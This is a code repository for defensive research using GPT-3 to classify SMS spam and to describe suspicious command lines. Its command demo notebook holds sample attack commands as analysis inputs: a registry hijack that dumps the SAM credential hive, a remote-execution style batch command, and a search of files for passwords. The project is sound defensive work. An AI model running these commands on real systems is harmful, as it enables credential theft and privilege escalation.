├── requirements.txt
├── spam_detector
│   ├── spam_data
│   │   ├── results_mean_f1_plot.pdf
│   │   └── experiment_1
│   │       ├── results_f1_plot.pdf
│   │       ├── results_gpt3_finetune.csv
│   │       ├── results_gpt3_fewshot.csv
│   │       ├── train_2.csv
│   │       ├── results_randomforest.csv
│   │       ├── results_logisticregression.csv
│   │       ├── train_8.csv
│   │       ├── train_32.csv
│   │       ├── test.csv
│   │       └── train_512.csv
│   ├── README.md
│   ├── spam_demo.ipynb
│   ├── sklearn_models.py
│   ├── gpt3_models.py
│   └── spam_detector.py
├── command_analyzer
│   ├── cmd_data
│   │   ├── data_cmd_tag_and_gold_reference_desc.json.zip
│   │   └── results_data_cmd_tag_and_gold_reference_desc.json_scores.csv
│   ├── README.md
│   ├── command_demo.ipynb
│   ├── similarity.py
│   ├── prompt_data.py
│   └── command_analyzer.py
├── README.md
└── LICENSE
/requirements.txt:
--------------------------------------------------------------------------------
1 | numpy==1.19.4
2 | pandas==1.3.3
3 | scikit-learn==0.20.3
4 | nltk==3.4
5 | matplotlib==3.5.1
6 | openai==0.20.0
--------------------------------------------------------------------------------
/spam_detector/spam_data/results_mean_f1_plot.pdf:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/sophos/gpt3-and-cybersecurity/HEAD/spam_detector/spam_data/results_mean_f1_plot.pdf
--------------------------------------------------------------------------------
/spam_detector/spam_data/experiment_1/results_f1_plot.pdf:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/sophos/gpt3-and-cybersecurity/HEAD/spam_detector/spam_data/experiment_1/results_f1_plot.pdf
--------------------------------------------------------------------------------
/command_analyzer/cmd_data/data_cmd_tag_and_gold_reference_desc.json.zip:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/sophos/gpt3-and-cybersecurity/HEAD/command_analyzer/cmd_data/data_cmd_tag_and_gold_reference_desc.json.zip
--------------------------------------------------------------------------------
/spam_detector/spam_data/experiment_1/results_gpt3_finetune.csv:
--------------------------------------------------------------------------------
1 | train_size,test_precision,test_recall,test_f1-score,test_support
2 | 512,0.9926339285714285,0.9921875,0.9922847939851616,256
3 | 1024,1.0,1.0,1.0,256
4 |
--------------------------------------------------------------------------------
/spam_detector/spam_data/experiment_1/results_gpt3_fewshot.csv:
--------------------------------------------------------------------------------
1 | train_size,test_precision,test_recall,test_f1-score,test_support
2 | 2,0.9446328364624965,0.9140625,0.9220379203515667,256
3 | 8,0.9773846557853911,0.9765625,0.9768543819554849,256
4 | 32,0.9801682692307693,0.9765625,0.9773792613636364,256
5 |
--------------------------------------------------------------------------------
/spam_detector/spam_data/experiment_1/train_2.csv:
--------------------------------------------------------------------------------
1 | label text
2 | Ham Am on the uworld site. Am i buying the qbank only or am i buying it with the self assessment also?
3 | Spam Free-message: Jamster!Get the crazy frog sound now! For poly text MAD1, for real text MAD2 to 88888. 6 crazy sounds for just 3 GBP/week! 16+only! T&C's apply
4 |
--------------------------------------------------------------------------------
/spam_detector/spam_data/experiment_1/results_randomforest.csv:
--------------------------------------------------------------------------------
1 | train_size,test_precision,test_recall,test_f1-score,test_support
2 | 2,0.890686274509804,0.875,0.8203605710066454,256
3 | 8,0.8925623739919355,0.89453125,0.8651752077831287,256
4 | 32,0.8260624562324931,0.85546875,0.8365655304963634,256
5 | 512,0.9723597935267857,0.97265625,0.9724764993116503,256
6 | 1024,0.9723597935267857,0.97265625,0.9724764993116503,256
7 |
--------------------------------------------------------------------------------
/command_analyzer/cmd_data/results_data_cmd_tag_and_gold_reference_desc.json_scores.csv:
--------------------------------------------------------------------------------
1 | ,ngram_bleu_generated_description_score,ngram_bleu_baseline_description_score,semantic_similarity_generated_description_score,semantic_similarity_baseline_description_score
2 | mean,0.20269268573332166,0.18891764397772917,0.9193342014745949,0.9046513387951954
3 | std,0.10771449055627129,0.10937139147679167,0.02980726068908328,0.04784594717568072
4 |
--------------------------------------------------------------------------------
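The `ngram_bleu_*` columns above appear to come from `get_ngrams_bleu_similarity_score` in `similarity.py`, which calls NLTK's `sentence_bleu` with weights `(0.5, 0.5, 0., 0.)`, i.e. unigrams and bigrams only. The following is a minimal pure-Python sketch of that metric, assuming whitespace tokenization and no smoothing; the helper names (`ngrams`, `modified_precision`, `bleu2`) are hypothetical, and NLTK's handling of zero overlaps may differ from this sketch.

```python
import math
from collections import Counter


def ngrams(tokens, n):
    """Return the list of n-grams (as tuples) in a token list."""
    return [tuple(tokens[i:i + n]) for i in range(len(tokens) - n + 1)]


def modified_precision(reference, candidate, n):
    """Clipped n-gram precision of the candidate against one reference."""
    cand_counts = Counter(ngrams(candidate, n))
    ref_counts = Counter(ngrams(reference, n))
    total = sum(cand_counts.values())
    if total == 0:
        return 0.0
    # Each candidate n-gram is credited at most as often as it occurs in the reference.
    clipped = sum(min(count, ref_counts[gram]) for gram, count in cand_counts.items())
    return clipped / total


def bleu2(reference_text, candidate_text):
    """Unigram+bigram BLEU with equal weights (hypothetical helper, no smoothing)."""
    reference = reference_text.split()
    candidate = candidate_text.split()
    if not candidate:
        return 0.0
    p1 = modified_precision(reference, candidate, 1)
    p2 = modified_precision(reference, candidate, 2)
    if p1 == 0.0 or p2 == 0.0:
        return 0.0  # assumption: treat a missing overlap as a zero score
    # Brevity penalty: penalize candidates that are not longer than the reference.
    if len(candidate) > len(reference):
        brevity_penalty = 1.0
    else:
        brevity_penalty = math.exp(1.0 - len(reference) / len(candidate))
    return brevity_penalty * math.exp(0.5 * math.log(p1) + 0.5 * math.log(p2))


print(bleu2("the command will list files", "the command will delete files"))
```

Because the score depends on exact token overlap, two descriptions that say the same thing in different words score low, which is consistent with the BLEU means above being far below the semantic-similarity means.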
/spam_detector/spam_data/experiment_1/results_logisticregression.csv:
--------------------------------------------------------------------------------
1 | train_size,test_precision,test_recall,test_f1-score,test_support
2 | 2,0.8352011308909528,0.6953125,0.7423407521724168,256
3 | 8,0.8814179345275345,0.80078125,0.8268168000650431,256
4 | 32,0.9171266417572463,0.83203125,0.8551778036153037,256
5 | 512,0.9608743134355384,0.95703125,0.9583006471367891,256
6 | 1024,0.9682624260622887,0.96484375,0.9658823476573728,256
7 |
--------------------------------------------------------------------------------
/command_analyzer/README.md:
--------------------------------------------------------------------------------
1 | # Command analyzer
2 |
3 | Invoke the following command to translate a command line into a natural language description.
4 |
5 | ```
6 | python command_analyzer.py --cmd="command line" --tags="comma separated tags"
7 | ```
8 |
9 |
10 | Invoke the following command to evaluate our back-translation approaches.
11 |
12 | First unzip the cmd_data/data_cmd_tag_and_gold_reference_desc.json.zip file; the password is the name of this repository.
13 |
14 | ```
15 | python command_analyzer.py --run_type=evaluate_approaches --path_output_json="cmd_data/results_data_cmd_tag_and_gold_reference_desc.json" --path_input_json="cmd_data/data_cmd_tag_and_gold_reference_desc.json"
16 | ```
17 |
18 |
19 | Demo examples are available in the [notebook](https://github.com/sophos/gpt3-and-cybersecurity/blob/main/command_analyzer/command_demo.ipynb).
20 |
21 | # Dataset
22 |
23 | The cmd_data folder provides a dataset of command lines, tags, and reference descriptions.
24 |
--------------------------------------------------------------------------------
/spam_detector/README.md:
--------------------------------------------------------------------------------
1 | # Spam detector
2 |
3 | Invoke the following command to identify a message as spam or ham.
4 |
5 | ```
6 | python spam_detector.py --message="test message"
7 | ```
8 |
9 | The above command generates a prompt using two in-context samples from [a training dataset](./spam_data/experiment_1/train_2.csv). The default training file can be changed with the --path_train_data option.
10 |
11 |
12 |
13 | Invoke the following command to evaluate spam detection approaches which include traditional ML models and novel GPT-3 models.
14 |
15 | ```
16 | python spam_detector.py --run_type=evaluate_approaches --path_data_folder=spam_data --num_experiments=5
17 | ```
18 |
19 |
20 | Demo examples are available in the [notebook](https://github.com/sophos/gpt3-and-cybersecurity/blob/main/spam_detector/spam_demo.ipynb).
21 |
22 | # Spam dataset
23 |
24 | The spam_data folder provides training and test datasets that were randomly sampled from a spam dataset. The [spam data](./spam_data/SMSSpamCollection) is from the [UCI SMS Spam Collection data set](https://archive.ics.uci.edu/ml/datasets/sms+spam+collection).
25 |
--------------------------------------------------------------------------------
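The spam detector README above says the classifier builds a prompt from in-context samples taken from a training file. The sketch below shows one way such a few-shot prompt could be assembled. The function name `build_fewshot_prompt` and the `Message:`/`Label:` layout are assumptions for illustration, not the format used by `spam_detector.py`; the two sample messages are taken from the training files in this repository.

```python
def build_fewshot_prompt(samples, message):
    """Build a few-shot classification prompt (hypothetical layout).

    samples: list of (label, text) pairs used as in-context examples.
    message: the new message the model should label.
    """
    lines = ["Classify each message as Spam or Ham.", ""]
    for label, text in samples:
        lines.append("Message: {}".format(text))
        lines.append("Label: {}".format(label))
        lines.append("")
    # Leave the final label empty so the model completes it.
    lines.append("Message: {}".format(message))
    lines.append("Label:")
    return "\n".join(lines)


samples = [
    ("Ham", "Just sent it. So what type of food do you like?"),
    ("Spam", "88066 FROM 88066 LOST 3POUND HELP"),
]
prompt = build_fewshot_prompt(samples, "test message")
print(prompt)
```

Passing more pairs in `samples` corresponds to the larger few-shot settings (8 or 32 examples) reported in `results_gpt3_fewshot.csv`, at the cost of a longer prompt.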
/spam_detector/spam_data/experiment_1/train_8.csv:
--------------------------------------------------------------------------------
1 | label text
2 | Spam Want to funk up ur fone with a weekly new tone reply TONES2U 2 this text. www.ringtones.co.uk, the original n best. Tones 3GBP network operator rates apply
3 | Ham Wat makes some people dearer is not just de happiness dat u feel when u meet them but de pain u feel when u miss dem!!!
4 | Spam CDs 4u: Congratulations ur awarded £500 of CD gift vouchers or £125 gift guaranteed & Freeentry 2 £100 wkly draw xt MUSIC to 87066 TnCs www.ldew.com1win150ppmx3age16
5 | Ham For me the love should start with attraction.i should feel that I need her every time around me.she should be the first thing which comes in my thoughts.I would start the day and end it with her.she s
6 | Ham Just sent it. So what type of food do you like?
7 | Spam Free-message: Jamster!Get the crazy frog sound now! For poly text MAD1, for real text MAD2 to 88888. 6 crazy sounds for just 3 GBP/week! 16+only! T&C's apply
8 | Spam SplashMobile: Choose from 1000s of gr8 tones each wk! This is a subscrition service with weekly tones costing 300p. U have one credit - kick back and ENJOY
9 | Ham Am on the uworld site. Am i buying the qbank only or am i buying it with the self assessment also?
10 |
--------------------------------------------------------------------------------
/README.md:
--------------------------------------------------------------------------------
1 | # Sophos AI GPT-3 for Cybersecurity Repository
2 |
3 | A key lesson of recent deep learning successes is that as we scale neural networks, they get better, and sometimes in game-changing ways.
4 | This repo provides two applications which demonstrate how GPT-3 opens new vistas for cybersecurity.
5 |
6 | ## How do I get started?
7 |
8 | There are two use cases: spam detection and command analysis.
9 | The code in this repo uses the OpenAI API, so set the OPENAI_API_KEY environment variable to your API key.
10 | Refer to the OpenAI documentation at https://beta.openai.com/docs/introduction.
11 |
12 | ### Spam detector
13 | Spam detector demonstrates how to identify spam messages using GPT-3 few-shot learning or fine-tuning.
14 |
15 | Change directory to spam_detector folder and follow the [instructions](./spam_detector/README.md).
16 |
17 |
18 | ### Command analyzer
19 | Command analyzer shows how to analyze complex command lines using GPT-3 few-shot learning.
20 |
21 | Change directory to command_analyzer folder and follow the [instructions](./command_analyzer/README.md).
22 |
23 |
24 | ## How do I cite GPT-3 for Cybersecurity?
25 |
26 | *Questions, ideas, feedback appreciated, please email younghoo.lee@sophos.com*
27 |
28 | @misc{Lee2022,
29 | author = {Lee, Younghoo},
30 | title = {GPT-3 for Cybersecurity},
31 | year = {2022},
32 | publisher = {GitHub},
33 | journal = {GitHub repository},
34 | howpublished = {\url{https://github.com/sophos-ai/gpt3-cybersecurity/}}
35 | }
36 |
--------------------------------------------------------------------------------
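The getting-started section above asks for the `OPENAI_API_KEY` environment variable to be set. A small check like the following, run before any of the scripts, can fail early with a clear message when the variable is missing. This is a sketch only: `require_api_key` is a hypothetical helper that is not part of this repository, and the key shown is a placeholder.

```python
import os


def require_api_key(env=None):
    """Return the API key from the environment or raise a clear error.

    env: a mapping to read from; defaults to os.environ (parameter added
    here only to make the helper easy to try without touching the shell).
    """
    env = os.environ if env is None else env
    key = env.get("OPENAI_API_KEY", "").strip()
    if not key:
        raise RuntimeError(
            "OPENAI_API_KEY is not set; export it before running the scripts."
        )
    return key


# Demonstration with an explicit mapping instead of the real environment.
demo_key = require_api_key({"OPENAI_API_KEY": "YOUR_API_KEY"})
print("key length:", len(demo_key))
```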
/spam_detector/spam_demo.ipynb:
--------------------------------------------------------------------------------
1 | {
2 | "cells": [
3 | {
4 | "cell_type": "code",
5 | "execution_count": 1,
6 | "metadata": {},
7 | "outputs": [],
8 | "source": [
9 | "import os\n",
10 | "import logging\n",
11 | "\n",
12 | "os.environ[\"OPENAI_API_KEY\"] = \"YOUR_API_KEY\"\n",
13 | "\n",
14 | "from spam_detector import classify_message\n",
15 | "\n",
16 | "logging.disable(logging.CRITICAL)\n",
17 | "\n",
18 | "def test_message(message, label):\n",
19 | " model_label = classify_message(\n",
20 | " message, \n",
21 | " path_train_data=\"spam_data/experiment_1/train_2.csv\", \n",
22 | " num_samples_in_prompt=2\n",
23 | " )\n",
24 | " print(\"label:{}, model_label:{}\".format(label, model_label))\n"
25 | ]
26 | },
27 | {
28 | "cell_type": "code",
29 | "execution_count": null,
30 | "metadata": {},
31 | "outputs": [],
32 | "source": [
33 | "# Replace \"YOUR_API_KEY\" in the first cell with your own key value."
34 | ]
35 | },
36 | {
37 | "cell_type": "code",
38 | "execution_count": 2,
39 | "metadata": {},
40 | "outputs": [
41 | {
42 | "name": "stdout",
43 | "output_type": "stream",
44 | "text": [
45 | "label:Spam, model_label:Spam\n"
46 | ]
47 | }
48 | ],
49 | "source": [
50 | "message = \"Reply with your name and address and YOU WILL RECEIVE BY POST a weeks completely free accommodation at various global locations www.phb1.com ph:08700435505150p\"\n",
51 | "\n",
52 | "test_message(message, label=\"Spam\")"
53 | ]
54 | },
55 | {
56 | "cell_type": "code",
57 | "execution_count": 3,
58 | "metadata": {},
59 | "outputs": [
60 | {
61 | "name": "stdout",
62 | "output_type": "stream",
63 | "text": [
64 | "label:Spam, model_label:Spam\n"
65 | ]
66 | }
67 | ],
68 | "source": [
69 | "message = \"Bloomberg -Message center +447797706009 Why wait? Apply for your future http://careers. bloomberg.com\"\n",
70 | "\n",
71 | "test_message(message, label=\"Spam\")"
72 | ]
73 | },
74 | {
75 | "cell_type": "code",
76 | "execution_count": 4,
77 | "metadata": {},
78 | "outputs": [
79 | {
80 | "name": "stdout",
81 | "output_type": "stream",
82 | "text": [
83 | "label:Ham, model_label:Ham\n"
84 | ]
85 | }
86 | ],
87 | "source": [
88 | "message = \"And you! Will expect you whenever you text! Hope all goes well tomo\"\n",
89 | "\n",
90 | "test_message(message, label=\"Ham\")"
91 | ]
92 | },
93 | {
94 | "cell_type": "code",
95 | "execution_count": 5,
96 | "metadata": {},
97 | "outputs": [
98 | {
99 | "name": "stdout",
100 | "output_type": "stream",
101 | "text": [
102 | "label:Ham, model_label:Ham\n"
103 | ]
104 | }
105 | ],
106 | "source": [
107 | "message = \"I'm okay. Chasing the dream. What's good. What are you doing next.\"\n",
108 | "\n",
109 | "test_message(message, label=\"Ham\")"
110 | ]
111 | }
112 | ],
113 | "metadata": {
114 | "kernelspec": {
115 | "display_name": "Python 3.7.3 ('py37')",
116 | "language": "python",
117 | "name": "python3"
118 | },
119 | "language_info": {
120 | "codemirror_mode": {
121 | "name": "ipython",
122 | "version": 3
123 | },
124 | "file_extension": ".py",
125 | "mimetype": "text/x-python",
126 | "name": "python",
127 | "nbconvert_exporter": "python",
128 | "pygments_lexer": "ipython3",
129 | "version": "3.7.3"
130 | },
131 | "orig_nbformat": 4,
132 | "vscode": {
133 | "interpreter": {
134 | "hash": "76a25e87fb8c87bd2343da81e5596777f4c7870efa99cccebacc9b427c0a0b42"
135 | }
136 | }
137 | },
138 | "nbformat": 4,
139 | "nbformat_minor": 2
140 | }
141 |
--------------------------------------------------------------------------------
/spam_detector/sklearn_models.py:
--------------------------------------------------------------------------------
1 | import pandas as pd
2 | import logging
3 | from collections import Counter
4 | from sklearn.feature_extraction.text import TfidfVectorizer
5 | from sklearn.ensemble import RandomForestClassifier
6 | from sklearn.linear_model import LogisticRegression
7 | from sklearn.metrics import classification_report
8 |
9 |
10 | logging.basicConfig(format="%(asctime)s %(message)s",
11 | datefmt="%Y-%m-%d %H:%M:%S", level=logging.INFO)
12 | logger = logging.getLogger(__name__)
13 |
14 |
15 | def extract_features(
16 |     df,
17 |     column_text="text",
18 |     column_label="label",
19 |     positive_label="Spam",
20 |     max_features=1000,
21 |     vectorizer=None,
22 | ):
23 |     """
24 |     extract ML features.
25 |     :param df: the data frame for input data
26 |     :param column_text: the column for text
27 |     :param column_label: the column for label
28 |     :param positive_label: the value for positive label
29 |     :param max_features: the max number of features
30 |     :param vectorizer: vectorizer for test data
31 |     """
32 |     if vectorizer is None:
33 |         vectorizer = TfidfVectorizer(max_features=max_features)
34 |         X = vectorizer.fit_transform(df[column_text])
35 |     else:
36 |         X = vectorizer.transform(df[column_text])
37 |     y = df[column_label] == positive_label
38 |     return X, y, vectorizer
39 |
40 |
41 | def train_sk_model(
42 |     X_train,
43 |     X_test,
44 |     y_train,
45 |     y_test,
46 |     model_name="RandomForest"
47 | ):
48 |     # map supported names to classes so an unknown name fails with a clear error
49 |     models = {"RandomForest": RandomForestClassifier, "LogisticRegression": LogisticRegression}
50 |     if model_name not in models:
51 |         raise ValueError("unsupported model_name: {}".format(model_name))
52 |     model = models[model_name]().fit(X_train, y_train)
53 |
54 |     y_pred = model.predict(X_test)
55 |     return classification_report(y_test, y_pred, output_dict=True)
56 |
57 |
58 | def evaluate_sklearn_model(
59 |     path_train_data,
60 |     path_test_data,
61 |     model_name="RandomForest",
62 |     max_features=1000,
63 |     column_text="text",
64 |     column_label="label",
65 |     positive_label="Spam"
66 | ):
67 |     """
68 |     evaluate sklearn models with training and test datasets.
69 |     :param path_train_data: file path for training dataset
70 |     :param path_test_data: file path for test dataset
71 |     :param model_name: model name
72 |     :param max_features: max number of ML features
73 |     :param column_text: the column for text
74 |     :param column_label: the column for label
75 |     :param positive_label: the value for positive label
76 |     """
77 |     df_train = pd.read_csv(path_train_data, sep="\t")
78 |     logger.info("path_train_data:{}, df_train.shape:{}".format(
79 |         path_train_data, df_train.shape))
80 |
81 |     X_train, y_train, vectorizer = extract_features(
82 |         df_train, max_features=max_features,
83 |         column_text=column_text, column_label=column_label,
84 |         positive_label=positive_label)
85 |     logger.info("X_train.shape:{}, y_train.shape:{}".format(
86 |         X_train.shape, y_train.shape))
87 |     logger.info("y_train.label.count:{}".format(Counter(y_train)))
88 |
89 |     df_test = pd.read_csv(path_test_data, sep="\t")
90 |     logger.info("path_test_data:{}, df_test.shape:{}".format(
91 |         path_test_data, df_test.shape))
92 |
93 |     X_test, y_test, _vectorizer = extract_features(
94 |         df_test, max_features=max_features, vectorizer=vectorizer,
95 |         column_text=column_text, column_label=column_label,
96 |         positive_label=positive_label)
97 |     logger.info("X_test.shape:{}, y_test.shape:{}".format(
98 |         X_test.shape, y_test.shape))
99 |     logger.info("y_test.label.count:{}".format(Counter(y_test)))
100 |
101 |     return train_sk_model(X_train, X_test, y_train, y_test, model_name=model_name)
102 |
--------------------------------------------------------------------------------
/spam_detector/spam_data/experiment_1/train_32.csv:
--------------------------------------------------------------------------------
1 | label text
2 | Ham Am in gobi arts college
3 | Spam Congrats! Nokia 3650 video camera phone is your Call 09066382422 Calls cost 150ppm Ave call 3mins vary from mobiles 16+ Close 300603 post BCM4284 Ldn WC1N3XX
4 | Ham Sorry * was at the grocers.
5 | Ham Its ok..come to my home it vl nice to meet and v can chat..
6 | Ham Rose needs water, season needs change, poet needs imagination..My phone needs ur sms and i need ur lovely frndship forever....
7 | Spam 83039 62735=£450 UK Break AccommodationVouchers terms & conditions apply. 2 claim you mustprovide your claim number which is 15541
8 | Ham Did he say how fantastic I am by any chance, or anything need a bigger life lift as losing the will 2 live, do you think I would be the first person 2 die from N V Q?
9 | Ham How's my loverboy doing ? What does he do that keeps him from coming to his Queen, hmmm ? Doesn't he ache to speak to me ? Miss me desparately ?
10 | Spam You will be receiving this week's Triple Echo ringtone shortly. Enjoy it!
11 | Ham Solve d Case : A Man Was Found Murdered On <DECIMAL> . <#> AfterNoon. 1,His wife called Police. 2,Police questioned everyone. 3,Wife: Sir,I was sleeping, when the murder took place. 4.Co
12 | Spam 18 days to Euro2004 kickoff! U will be kept informed of all the latest news and results daily. Unsubscribe send GET EURO STOP to 83222.
13 | Spam SplashMobile: Choose from 1000s of gr8 tones each wk! This is a subscrition service with weekly tones costing 300p. U have one credit - kick back and ENJOY
14 | Spam Congratulations ur awarded either a yrs supply of CDs from Virgin Records or a Mystery Gift GUARANTEED Call 09061104283 Ts&Cs www.smsco.net £1.50pm approx 3mins
15 | Spam Bored of speed dating? Try SPEEDCHAT, txt SPEEDCHAT to 80155, if you don't like em txt SWAP and get a new chatter! Chat80155 POBox36504W45WQ 150p/msg rcd 16
16 | Ham Just sent it. So what type of food do you like?
17 | Spam ree entry in 2 a weekly comp for a chance to win an ipod. Txt POD to 80182 to get entry (std txt rate) T&C's apply 08452810073 for details 18+
18 | Spam Want to funk up ur fone with a weekly new tone reply TONES2U 2 this text. www.ringtones.co.uk, the original n best. Tones 3GBP network operator rates apply
19 | Ham Wat makes some people dearer is not just de happiness dat u feel when u meet them but de pain u feel when u miss dem!!!
20 | Ham Mm you ask him to come its enough :-)
21 | Spam Your 2004 account for 07XXXXXXXXX shows 786 unredeemed points. To claim call 08719181259 Identifier code: XXXXX Expires 26.03.05
22 | Ham Today i'm not workin but not free oso... Gee... Thgt u workin at ur fren's shop ?
23 | Spam Free-message: Jamster!Get the crazy frog sound now! For poly text MAD1, for real text MAD2 to 88888. 6 crazy sounds for just 3 GBP/week! 16+only! T&C's apply
24 | Ham Thanx. Yup we coming back on sun. Finish dinner going back 2 hotel now. Time flies, we're tog 4 exactly a mth today. Hope we'll haf many more mths to come...
25 | Spam 88066 FROM 88066 LOST 3POUND HELP
26 | Ham I need... Coz i never go before
27 | Spam Hi, this is Mandy Sullivan calling from HOTMIX FM...you are chosen to receive £5000.00 in our Easter Prize draw.....Please telephone 09041940223 to claim before 29/03/05 or your prize will be transfer
28 | Spam todays vodafone numbers ending with 0089(my last four digits) are selected to received a £350 award. If your number matches please call 09063442151 to claim your £350 award
29 | Ham Am on the uworld site. Am i buying the qbank only or am i buying it with the self assessment also?
30 | Ham For me the love should start with attraction.i should feel that I need her every time around me.she should be the first thing which comes in my thoughts.I would start the day and end it with her.she s
31 | Ham Or I guess <#> min
32 | Spam CDs 4u: Congratulations ur awarded £500 of CD gift vouchers or £125 gift guaranteed & Freeentry 2 £100 wkly draw xt MUSIC to 87066 TnCs www.ldew.com1win150ppmx3age16
33 | Spam Dear Matthew please call 09063440451 from a landline, your complimentary 4*Lux Tenerife holiday or £1000 CASH await collection. ppm150 SAE T&Cs Box334 SK38XH.
34 |
--------------------------------------------------------------------------------
/command_analyzer/command_demo.ipynb:
--------------------------------------------------------------------------------
1 | {
2 | "cells": [
3 | {
4 | "cell_type": "code",
5 | "execution_count": 1,
6 | "metadata": {},
7 | "outputs": [],
8 | "source": [
9 | "import os\n",
10 | "import logging\n",
11 | "\n",
12 | "os.environ[\"OPENAI_API_KEY\"] = \"YOUR_API_KEY\"\n",
13 | "\n",
14 | "from command_analyzer import generate_description\n",
15 | "\n",
16 | "logging.disable(logging.CRITICAL)\n",
17 | "\n",
18 | "def command_to_description(command, tags):\n",
19 | " description, baseline_description, candidates = generate_description(command, tags)\n",
20 | " print(\"description:\\n{}\".format(description))\n",
21 | " print(\"baseline_description:\\n{}\".format(baseline_description)) \n"
22 | ]
23 | },
24 | {
25 | "cell_type": "code",
26 | "execution_count": 2,
27 | "metadata": {},
28 | "outputs": [],
29 | "source": [
30 | "# Replace \"YOUR_API_KEY\" in the first cell with your own key value."
31 | ]
32 | },
33 | {
34 | "cell_type": "code",
35 | "execution_count": 3,
36 | "metadata": {},
37 | "outputs": [
38 | {
39 | "name": "stdout",
40 | "output_type": "stream",
41 | "text": [
42 | "description:\n",
43 | "The command will create a registry value \"command\" under the registry key \"hkcu\\software\\classes\\ms-settings\\shell\\open\" and set its default value to \"reg.exe save hklm\\sam C:\\Users\\Pcs\\AppData\\Local\\Temp\\sam.save\". This default value will then be executed when the user clicks on the Windows \"Settings\" icon. The command will add a value under the \"reg.exe\" key in the \"open\\command\" directory of the \"ms-settings\" key in the \"HKCU\" hive. The value data is \"reg.exe save hklm\\sam C:\\Users\\Pcs\\AppData\\Local\\Temp\\sam.save\".\n",
44 | "baseline_description:\n",
45 | "The command will attempt to dump the SAM registry hive to the specified path.\n"
46 | ]
47 | }
48 | ],
49 | "source": [
50 | "command = \"reg.exe add hkcu\\\\software\\\\classes\\\\ms-settings\\\\shell\\\\open\\\\command /ve /d \\\"reg.exe save hklm\\\\sam C:\\\\Users\\\\Pcs\\\\AppData\\\\Local\\\\Temp\\\\sam.save\\\" /f\"\n",
51 | "tags = \"win_pc_reg_dump_sam,win_pc_suspicious_reg_open_command\"\n",
52 | "command_to_description(command, tags)\n"
53 | ]
54 | },
55 | {
56 | "cell_type": "code",
57 | "execution_count": 4,
58 | "metadata": {},
59 | "outputs": [
60 | {
61 | "name": "stdout",
62 | "output_type": "stream",
63 | "text": [
64 | "description:\n",
65 | "The command will echo the \"dir\" command to a file called \"execute.bat\", write the command to the \"execute.bat\" file, and then execute the \"execute.bat\" file. This command will list the contents of the directory \"C:\\Users\\admin\\OneDrive ADMINISTRATORS INC\" and write the output to \"\\\\127.0.0.1\\C$\\__output\". The \"dir\" command will be executed as the \"Local System\" account.\n",
66 | "baseline_description:\n",
67 | "The command will list the contents of the \"C:\\Users\\admin\\OneDrive ADMINISTRATORS INC\" directory and save the output to \"C:\\__output\". It will be executed as the LocalSystem account.\n"
68 | ]
69 | }
70 | ],
71 | "source": [
72 | "command = \"C:\\\\WINDOWS\\\\system32\\\\cmd.exe /Q /c echo dir \\\"C:\\\\Users\\\\admin\\\\OneDrive ADMINISTRATORS INC\\\" ^> \\\\\\\\127.0.0.1\\\\C$\\\\__output 2^>^&1 > C:\\\\WINDOWS\\\\TEMP\\\\execute.bat & C:\\\\WINDOWS\\\\system32\\\\cmd.exe /Q /c C:\\\\WINDOWS\\\\TEMP\\\\execute.bat & del C:\\\\WINDOWS\\\\TEMP\\\\execute.bat\"\n",
73 | "tags = \"win_local_system_owner_account_discovery\"\n",
74 | "command_to_description(command, tags)"
75 | ]
76 | },
77 | {
78 | "cell_type": "code",
79 | "execution_count": 5,
80 | "metadata": {},
81 | "outputs": [
82 | {
83 | "name": "stdout",
84 | "output_type": "stream",
85 | "text": [
86 | "description:\n",
87 | "The command will recursively list all files in the \"C:\\Users\\Pcs\\Desktop\" directory and all subdirectories, and will search the output for files containing the word \"password\".\n",
88 | "baseline_description:\n",
89 | "The command will list all files and directories on the target machine and pipe the output to a search for the string \"password\".\n"
90 | ]
91 | }
92 | ],
93 | "source": [
94 | "command = \"\\\"cmd.exe\\\" dir /b /s \\\"C:\\\\Users\\\\Pcs\\\\Desktop\\\\*.*\\\" | findstr /i \\\"password\\\"\"\n",
95 | "tags = \"win_pc_suspicious_dir,win_suspicious_findstr\"\n",
96 | "command_to_description(command, tags)"
97 | ]
98 | }
99 | ],
100 | "metadata": {
101 | "kernelspec": {
102 | "display_name": "Python 3.7.3 ('py37')",
103 | "language": "python",
104 | "name": "python3"
105 | },
106 | "language_info": {
107 | "codemirror_mode": {
108 | "name": "ipython",
109 | "version": 3
110 | },
111 | "file_extension": ".py",
112 | "mimetype": "text/x-python",
113 | "name": "python",
114 | "nbconvert_exporter": "python",
115 | "pygments_lexer": "ipython3",
116 | "version": "3.7.3"
117 | },
118 | "orig_nbformat": 4,
119 | "vscode": {
120 | "interpreter": {
121 | "hash": "76a25e87fb8c87bd2343da81e5596777f4c7870efa99cccebacc9b427c0a0b42"
122 | }
123 | }
124 | },
125 | "nbformat": 4,
126 | "nbformat_minor": 2
127 | }
128 |
--------------------------------------------------------------------------------
/command_analyzer/similarity.py:
--------------------------------------------------------------------------------
1 | import numpy as np
2 | import logging
3 | from nltk.translate.bleu_score import sentence_bleu
4 | from openai.embeddings_utils import get_embeddings
5 |
6 |
7 | logging.basicConfig(format="%(asctime)s %(message)s",
8 | datefmt='%Y-%m-%d %H:%M:%S', level=logging.INFO)
9 | logger = logging.getLogger(__name__)
10 |
11 |
12 | def get_embedding_similarity_score_list(
13 |     cmd,
14 |     tags,
15 |     items,
16 |     max_cmd_len=200,
17 |     weight_desc_score=0.3,
18 |     weight_tags_score=0.2,
19 |     engine="text-similarity-babbage-001"
20 | ):
21 |     """
22 |     returns one tuple per item with the weighted score and its component scores.
23 |     :param cmd: command line data
24 |     :param tags: tags data
25 |     :param items: contains a list of (desc, generated_cmd)
26 |     :param max_cmd_len: max length of command line data
27 |     :param weight_desc_score: the weight for description score
28 |     :param weight_tags_score: the weight for tags score
29 |     :param engine: engine for similarity score
30 |     """
31 |     code_items = [cmd[:max_cmd_len]] + [item[1] for item in items]
32 |     if weight_tags_score>0:
33 |         code_items += [tags]
34 |     code_matrix = get_embeddings(code_items, engine=engine)
35 |     if weight_tags_score>0:
36 |         tags_emb = code_matrix[-1]
37 |     #description embeddings feed both desc_score and tags_score
38 |     if weight_desc_score>0 or weight_tags_score>0:
39 |         desc_items = [item[0] for item in items]
40 |         desc_matrix = get_embeddings(desc_items, engine=engine)
41 |
42 |     reference_code_emb = code_matrix[0]
43 |     score_list = []
44 |     for ix in range(len(items)):
45 |         desc, generated_cmd = items[ix]
46 |         #dot product of two embeddings; equals cosine similarity for unit-length vectors
47 |         code_score = np.dot(reference_code_emb, code_matrix[1+ix])
48 |         #get a weighted score from 3 scores
